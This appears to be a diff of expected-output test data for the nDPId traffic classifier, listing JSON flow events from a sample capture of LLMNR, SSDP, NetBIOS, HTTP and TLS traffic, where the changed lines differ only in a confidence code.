-00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104396889,"flow_last_seen":1470104396987,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":54470,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104396889,"flow_last_seen":1470104396987,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":54470,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104398832,"flow_last_seen":1470104398832,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.64","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104411327,"flow_last_seen":1470104411735,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":54506,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1470104377634,"flow_last_seen":1470104415729,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1096,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"239.255.255.250","src_port":60267,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104392380,"flow_last_seen":1470104392380,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59789,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104411327,"flow_last_seen":1470104411735,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.37","dst_ip":"224.0.0.252","src_port":54506,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1470104377634,"flow_last_seen":1470104415729,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1096,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"239.255.255.250","src_port":60267,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104392380,"flow_last_seen":1470104392380,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59789,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104375419,"flow_last_seen":1470104398314,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104375419,"flow_last_seen":1470104398314,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104399959,"flow_last_seen":1470104400366,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":62756,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104399959,"flow_last_seen":1470104400366,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":62756,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104389597,"flow_last_seen":1470104425786,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53613,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104389597,"flow_last_seen":1470104425786,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104385827,"flow_last_seen":1470104420541,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"59.120.208.218","dst_ip":"255.255.255.255","src_port":50151,"dst_port":1947,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104385827,"flow_last_seen":1470104420541,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"59.120.208.218","dst_ip":"255.255.255.255","src_port":50151,"dst_port":1947,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1470104390443,"flow_last_seen":1470104422398,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104403134,"flow_last_seen":1470104403234,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":58702,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104391254,"flow_last_seen":1470104391361,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":63659,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104416855,"flow_last_seen":1470104416959,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104416855,"flow_last_seen":1470104416958,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1470104390443,"flow_last_seen":1470104422398,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104403134,"flow_last_seen":1470104403234,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":58702,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104391254,"flow_last_seen":1470104391361,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":63659,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104416855,"flow_last_seen":1470104416959,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104416855,"flow_last_seen":1470104416958,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104391199,"flow_last_seen":1470104391208,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"64.233.189.128","src_port":49581,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}} 
00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1470104391199,"flow_last_seen":1470104391208,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"64.233.189.128","src_port":49581,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104378045,"flow_last_seen":1470104378454,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":58779,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104377754,"flow_last_seen":1470104422913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1218,"flow_tot_l4_payload_len":2048,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104379903,"flow_last_seen":1470104379989,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2665,"flow_avg_l4_payload_len":205,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1470104379916,"flow_last_seen":1470104380338,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":33005,"flow_avg_l4_payload_len":660,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104378906,"flow_last_seen":1470104424115,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":734,"flow_tot_l4_payload_len":1576,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104378045,"flow_last_seen":1470104378454,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":58779,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104377754,"flow_last_seen":1470104422913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1218,"flow_tot_l4_payload_len":2048,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104379903,"flow_last_seen":1470104379989,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2665,"flow_avg_l4_payload_len":205,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1470104379916,"flow_last_seen":1470104380338,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":33005,"flow_avg_l4_payload_len":660,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104378906,"flow_last_seen":1470104424115,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":734,"flow_tot_l4_payload_len":1576,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"}} 00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378005,"flow_last_seen":1470104378007,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53622,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378005,"flow_last_seen":1470104378007,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53622,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1470104381237,"flow_last_seen":1470104402191,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2520,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
